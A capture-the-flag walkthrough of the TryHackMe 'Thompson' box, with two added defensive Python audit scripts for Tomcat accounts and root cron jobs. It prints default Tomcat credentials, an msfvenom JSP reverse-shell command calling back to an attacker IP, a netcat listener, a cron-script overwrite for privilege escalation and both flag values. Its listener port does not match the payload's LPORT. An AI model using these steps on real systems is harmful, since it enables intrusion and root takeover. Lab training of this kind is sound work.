Thompson

sumesh kumar sudarshan kumar
4 min readJun 16, 2021

boot2root machine for FIT and besides Guatemala CTF

This is the write-up for room Thompson on Tryhackme and it is part of our cybersecurity training from HackerU.

First, we connect to the TryHackMe lab environment, either through the VPN or by using the AttackBox on the TryHackMe site.

VPN connection with THM

Next we deploy the machine; once it starts, the target system IP is shown.

Target IP

Once the machine has booted, we move on to the tasks. Before that we have to do some enumeration: we check which ports are open and which services are running using an Nmap scan.

Nmap scan

nmap -sS -sV -A 10.10.153.46

-sS (TCP SYN scan)

-sV (Version detection)

-A (Aggressive scan options)

From the scan we can see that three ports are open: port 22, port 8080 and port 8009.

Since port 8080/http is open, we will look at the web server.

Opening the web server on port 8080 gives us some information about Tomcat.

Going through the Tomcat page, we can see three buttons. We will check them.

We will click on the Manager App button.

Webpage

Once the button is clicked, a dialog box prompts for credentials. As we do not know them, we click the Cancel button; this redirects to a page that contains the credentials of the Tomcat manager.

User credential

Username :- tomcat

Password :- s3cret

We log in to the Tomcat manager application with the credentials we found.
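The weakness exploited here is a manager account that still carries the example password from Tomcat's own documentation. The following audit script is an added example (not part of this write-up or of Tomcat) that parses a `tomcat-users.xml` and flags accounts holding manager roles with a documentation example password, blank passwords, and any other manager-role accounts for review. The XML document is constructed for the example; the role names are Tomcat's standard ones.

```python
# Added example: audit a Tomcat tomcat-users.xml for weak manager accounts.
# Assumes Tomcat's standard <tomcat-users> XML layout; SAMPLE_XML is constructed.
import xml.etree.ElementTree as ET

# Standard Tomcat roles that allow deploying or administering applications.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx",
    "manager-status", "admin-gui", "admin-script",
}

# Values that appear as examples in Tomcat's documentation and 401 page
# (the pair found in this write-up); no deployment should keep them.
EXAMPLE_PASSWORDS = {"s3cret", "tomcat"}

# Constructed sample file for the demonstration.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="unique-deploy-secret" roles="manager-script"/>
  <user username="guest" password="" roles="tomcat"/>
</tomcat-users>
"""


def _local(tag):
    """Strip the XML namespace so '{...}user' compares as 'user'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, issue) pairs for accounts that need attention."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = sorted(roles & PRIVILEGED_ROLES)
        if privileged and password in EXAMPLE_PASSWORDS:
            findings.append((name, "documentation example password on roles "
                             + ",".join(privileged)))
        elif password == "":
            findings.append((name, "blank password"))
        elif privileged:
            findings.append((name, "holds manager roles " + ",".join(privileged)
                             + "; confirm the account is needed and its password is unique"))
    return findings


if __name__ == "__main__":
    for user, issue in audit_tomcat_users(SAMPLE_XML):
        print(f"{user}: {issue}")
```

Run it against a real file with `audit_tomcat_users(open("conf/tomcat-users.xml").read())`. Beyond the password check, Tomcat ships the manager application with a `RemoteAddrValve` in its `META-INF/context.xml` that limits access to localhost; leaving that in place means a guessed password is not reachable from the network.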

It redirects us to another page.

Logged in

Here we see that there is an option to upload a WAR file.

War file upload

We then searched a little for what a WAR file is and learned that it is a Java-related archive.

War file details

So we searched the msfvenom payload list for a payload that can be packaged as a WAR file.

Payload search

As seen, we select the java/jsp_shell_reverse_tcp payload and create a WAR file payload to get a reverse shell.

payload creation

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.11.235 LPORT=4444 -f war > shell.war

Another option is to search directly for a WAR payload, which turns up a cheat sheet for it (https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/).

Now we will upload our file to the website.

File uploaded

Before clicking the uploaded file, we start a netcat listener to catch the reverse shell. The listener port must match the LPORT value given to msfvenom.

nc -lvnp 1234

Open the /shell path we uploaded and the reverse shell connects back to our system.

Netcat shell

With a shell, we now search for the flags.

Inside the home directory, we found the user jack and the user flag.

user.txt
User flag

user flag:- 39400c90bc683a41a8935e4719f181bf

We used Python to get an interactive shell, though this is not necessary.

In jack's home directory there are two more files, “test.txt” and “id.sh”. We will look at their contents.

file content

We found that “test.txt” is written by root.

Usually id.sh is executed by the root user, and its output ends up in test.txt as well.

So we check the crontab.

crontab

Since id.sh is executed by the root user, we overwrite id.sh with a command that copies root.txt from root's home directory into jack's home directory.

echo "cp /root/root.txt /home/jack/root.txt" > id.sh

Once the cron job runs, it gives us the root flag.
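The privilege escalation works because a script that root runs from cron sits in a user's home directory and can be modified by that user. The following audit is an added example (not part of this write-up or of TryHackMe) that parses `/etc/crontab`-style entries, picks out the ones run as root, and flags any whose script file or parent directory is owned by someone other than the trusted owner or is group/world writable. The crontab text and the files it points at are constructed in a temporary directory; `trusted_uid` is a parameter of this example so the demo works when run as an ordinary user (on a real host, call it as root with the default of 0).

```python
# Added example: find root cron jobs whose script a non-root user can change.
# Assumes /etc/crontab syntax (schedule, user, command). All sample data is constructed.
import os
import stat
import tempfile

# Constructed /etc/crontab; {base} is replaced with the temp directory below.
SAMPLE_CRONTAB = """# constructed crontab for the example
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root {base}/home/jack/id.sh
0 3 * * * root {base}/usr/local/bin/backup.sh
"""

GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH


def parse_system_crontab(text):
    """Return (user, command) pairs, skipping comments, blanks and env assignments."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)  # 5 schedule fields, user, rest of line
        if len(fields) == 7:
            entries.append((fields[5], fields[6]))
    return entries


def writable_by_others(path, trusted_uid=0):
    """True if the file or its directory is not owned by trusted_uid or is group/world writable."""
    st = os.stat(path)
    if st.st_uid != trusted_uid or st.st_mode & GROUP_OR_WORLD_WRITE:
        return True
    parent = os.stat(os.path.dirname(path) or ".")
    # A writable directory lets the script be replaced even if the file itself is locked.
    return parent.st_uid != trusted_uid or bool(parent.st_mode & GROUP_OR_WORLD_WRITE)


def find_weak_cron_scripts(crontab_text, trusted_uid=0):
    """Return (script, issue) pairs for root entries whose script can be tampered with."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        script = command.split()[0]
        if not os.path.isabs(script) or not os.path.exists(script):
            findings.append((script, "script path missing or not absolute"))
        elif writable_by_others(script, trusted_uid):
            findings.append((script, "modifiable by a non-root user"))
    return findings


def build_demo_tree():
    """Create a constructed filesystem layout: a world-writable id.sh and a sane backup.sh."""
    base = tempfile.mkdtemp(prefix="cron-audit-")
    jack = os.path.join(base, "home", "jack")
    sbin = os.path.join(base, "usr", "local", "bin")
    for d in (jack, sbin):
        os.makedirs(d)
        os.chmod(d, 0o755)
    id_sh = os.path.join(jack, "id.sh")
    with open(id_sh, "w") as f:
        f.write("#!/bin/sh\nid > /home/jack/test.txt\n")
    os.chmod(id_sh, 0o777)  # the misconfiguration: anyone can rewrite it
    backup = os.path.join(sbin, "backup.sh")
    with open(backup, "w") as f:
        f.write("#!/bin/sh\necho backup\n")
    os.chmod(backup, 0o755)
    return base


def demo():
    """Run the audit over the constructed tree; the current user stands in for root."""
    base = build_demo_tree()
    return find_weak_cron_scripts(SAMPLE_CRONTAB.format(base=base), trusted_uid=os.getuid())


if __name__ == "__main__":
    for script, issue in demo():
        print(f"{script}: {issue}")
```

The fix on a real host is the mirror image of the check: scripts run by root from cron belong in a root-owned directory such as /usr/local/sbin with mode 0755 or stricter, and the cron entry should reference them by absolute path.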

root.txt
root flag

root flag:- d89d5391984c0450a95497153ae7ca3a

Thus we were able to crack the box, escalate privileges to root and capture both flags.


sumesh kumar sudarshan kumar

Cyber security enthusiast currently learning cybersecurity as RED team From HackerU